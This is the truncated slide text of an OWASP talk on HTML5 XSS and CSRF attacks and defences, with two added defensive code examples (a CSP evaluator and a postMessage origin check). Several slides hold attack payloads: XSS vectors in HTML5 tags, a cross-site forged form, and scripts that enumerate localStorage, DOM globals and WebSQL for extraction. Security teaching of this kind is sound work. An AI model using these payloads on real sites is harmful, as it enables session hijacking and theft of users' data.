XSS & CSRF with HTML5 – Attack, Exploit and Defense – Shreeraj Shah ...
http://shreeraj.blogspot.com ...
HTML5 VECTORS – ATTACK SURFACE – OWASP 3
HTML5 – Attacks on the rise … Evolution of HTML5: 1991 – HTML started (plain and simple); 1996 – CSS & JavaScript (Welc...
Modern Browser Model – Mobile H...
HTML5 Architecture & Threat Model – User Interface ...
CSRF WITH HTML5 – OWASP 7
CSRF Attack Vector – Attacker’s ...
SOP bypass and Cookie Replay – Basic Type: GET Request – IMG SRC <img src="http://host/?command">; SCRIPT...
Streams – name/value pairs are gone … JSON, XML ...
CSRF injection – splitting and forcing … <html><body><FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/...
CSRF with XHR and CORS bypass – Mobile ...
XHR – Level 2 powering CSRF: the XHR object of HTML5 is very powerful and allows interesting features like cross origin request ...
CORS & XHR – ingredients for CSRF: Before HTML5 – cross domain was not possible through XHR (SOP applicable). HTML5 – allows...
CORS based HTTP Headers – Request: Origin, Access-Control-Request-Method (preflight), Access-Control-Request-Headers (prefli...
XHR – Stealth POST/GET: CSRF powered by CORS and XHR, hence allowing a stealth channel and possible silent exploitation ...
Exploiting the use case: CORS preflight bypass – certain Content-Type values bypass the preflight HTTP request; forcing cookie replay by “withC...
CSRF with XHR/HTML5 – Authentication ...
CSRF with XHR/HTML5 – Browser using XHR Call ...
CSRF with XHR/HTML5 – Attacker’s ...
CSRF & HTML5 – OWASP 21
CSRF with XHR/HTML5 – Attacker’s ...
CSRF & HTML5 – OWASP 23
CSRF with XHR/HTML5 – Browser is having Form (multi-part) ...
CSRF/Upload - POC – OWASP 25
CSRF with XHR/HTML5 – Attacker’s ...
CSRF/Upload – OWASP 27
Internal Scan – not scan but crawl as well … Attacker’s ...
Internal Scan for CORS – OWASP 29
Scan and Defend – Scan and look for: Content-Type checking on server side; CORS policy scan; Form and Upload with tokens ...
XSS WITH HTML5 – OWASP 31
XSS with HTML5 (tags, attributes and events) ...
HTML5 – Tags/Attributes/Events: Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form cont...
XSS variants – Media tags – Examples: <video><source onerror="javascript:alert(1)"> <video onerror="javascript:alert(1)">...
XSS variants – Exploiting autofocus: <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> – OWASP 35
XSS variants – Form & Button etc.: <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form...
Scan and Defend – Scan and look for: Reflected or Persistent XSS spots with HTML5 tags. Defense and Countermeasures: Have i...
CSP in Action – HTML5 defense … Content Security Policy – defending the browser against possible post-attack scenarios. Base...
Blocking Scripts: Content-Security-Policy: script-src 'self' – only allowing script from self. Other mechanism: unsafe...
Controlling Browser: connect-src – controlling WebSocket, XHR etc.; frame-src – source of the frame (ClickJacking); object-sr...
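To make the two CSP slides concrete, an added example (not from the deck) that parses a policy and answers whether a given script, XHR/WebSocket, frame or object load would be allowed; it models 'self', 'none', 'unsafe-inline', scheme and wildcard host sources only, and the policy string and page origin are constructed.

```javascript
// Added example (not from the slides): a small evaluator for the CSP source
// directives named above (script-src, connect-src, frame-src, object-src).
// It handles 'self', 'none', 'unsafe-inline', scheme sources (https:, wss:)
// and host sources with an optional leading wildcard; real browsers also
// implement nonces, hashes, ports and paths, which are left out here.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// "*.cdn.example" matches "a.cdn.example" but not "cdn.example" itself.
function hostMatches(pattern, host) {
  return pattern.startsWith("*.") ? host.endsWith(pattern.slice(1)) : pattern === host;
}

// Does one source expression permit loading `url` into a page at `pageOrigin`?
function sourceMatches(source, pageOrigin, url) {
  const u = new URL(url), page = new URL(pageOrigin);
  if (source === "'self'") return u.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return u.protocol === source.toLowerCase(); // scheme source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:\/'"]+)$/i.exec(source);                  // [scheme://]host
  if (!m) return false;                                                                  // a keyword we do not model
  const [, scheme, host] = m;
  if (scheme) { if (u.protocol !== scheme.toLowerCase() + ":") return false; }
  else if (u.protocol !== page.protocol && u.protocol !== "https:") return false;        // scheme-less host: page scheme or https
  return hostMatches(host.toLowerCase(), u.hostname);
}

// Does `policy` allow `url` (or an inline script when url is null) under `directive`?
// Fetch directives fall back to default-src, as in browsers; no applicable directive means allow.
function cspAllows(policy, directive, pageOrigin, url) {
  const sources = policy[directive] || policy["default-src"];
  if (!sources) return true;
  if (sources.includes("'none'")) return false;
  if (url === null) return sources.includes("'unsafe-inline'");
  return sources.some((s) => sourceMatches(s, pageOrigin, url));
}
```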
Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: A...
Storage extraction with XSS                                                                                     Mobile    ...
Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (L...
Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no useg...
Blind storage enumerationif(localStorage.length){          console.log(localStorage.length)          for(i in localStorage...
File System StorageHTML5 provides virtual file system with filesystem APIs   window.requestFileSystem = window.requestFi...
File System StorageIt provides temporary or permanent file system   function init() {       window.requestFileSystem(wind...
Sensitive information filesystemAssuming app is creating profile on local system                                         ...
Extraction through XSSOnce have an entry point – game over!                                         OWASP                ...
Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while load...
Blind Enumerationfor(i in window){  obj=window[i];   try{        if(typeof(obj)=="string"){           console.log(i);     ...
Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, obj...
Global Sensitive Information Extraction from DOMfor(i in window){  obj=window[i];  if(obj!=null||obj!=undefined)      var ...
Scan and DefendScan and look for  Scanning storageDefense and Countermeasures  Do not store sensitive information on l...
SQLi & Blind Enumeration through XSS                                                                                     M...
SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data...
SQL InjectionThrough JavaScript one can harvest entire local database.Example                                           ...
Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){            obj = window[i];            try{     ...
Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Selec...
Blind WebSQL Enumeration                           OWASP                      60
Web Messaging and Worker Injection                                                                                     Mob...
Web Messaging HTML5 is having new interframe communication system  called Web Messaging. By postMessage() call parent fr...
Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, ...
Origin check                    OWASP               64
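The origin check from the Web Messaging slides, as an added example that is not from the deck: a receiver that validates event.origin and dispatches on a fixed command set, and a sender that names its target origin instead of "*"; TRUSTED_ORIGIN and the command names are constructed.

```javascript
// Added example (not from the slides): receiving and sending Web Messaging
// with the origin check the slide calls for. handleMessage() is a pure
// function over the MessageEvent fields (origin, data) so it can be tested
// outside a browser; TRUSTED_ORIGIN and the command names are assumptions.
const TRUSTED_ORIGIN = "https://app.example.com";
const ALLOWED_COMMANDS = new Set(["setTitle", "ping"]);

function handleMessage(event, trustedOrigin = TRUSTED_ORIGIN) {
  // 1. Compare event.origin with the one origin we expect. Without this check any page
  //    that embeds us in an iframe (or that we embed) can drive the handler.
  if (event.origin !== trustedOrigin) return { accepted: false, reason: "untrusted origin" };
  // 2. Even from the trusted origin, treat data as input: parse it, dispatch on a
  //    known command name, and never eval() or innerHTML it.
  let msg = event.data;
  if (typeof msg === "string") {
    try { msg = JSON.parse(msg); } catch (e) { return { accepted: false, reason: "malformed" }; }
  }
  if (!msg || typeof msg !== "object" || !ALLOWED_COMMANDS.has(msg.cmd)) {
    return { accepted: false, reason: "unknown command" };
  }
  return { accepted: true, cmd: msg.cmd, text: msg.text == null ? "" : String(msg.text) };
}

// Sending side: name the target origin explicitly. With "*" the message is delivered
// to whatever origin happens to be loaded in that window at the time.
function sendTo(targetWindow, payload, targetOrigin = TRUSTED_ORIGIN) {
  targetWindow.postMessage(JSON.stringify(payload), targetOrigin);
}

// Browser wiring; skipped under Node so the functions above stay testable.
if (typeof window !== "undefined") {
  window.addEventListener("message", (e) => {
    const r = handleMessage(e);
    if (r.accepted && r.cmd === "setTitle") document.title = r.text; // assign text, not markup
  });
}
```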
Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like set...
Web Worker – Hacks!                                                  Web Page                                             ...
Web Worker – Hacks!Security issues  It is not allowing to load cross domain worker scripts.   (http:, https:,javascript:...
Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button...
Web Workers – Hacks!Possible to cause XSS   Running script   Passing hidden payloadAlso, web workers can help in embed...
Scan and DefendScan and look for  JavaScript scanning  Messaging and Worker implementation  DOM calls  Use of eval(),...
APIs …HTML5 few other APIs are interesting from security standpoint   File APIs – allows local file access and can mixed...
Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_She...
http://shreeraj.blogspot.com                  http://shreeraj.blogspot.com                   shreeraj@blueinfy.com        ...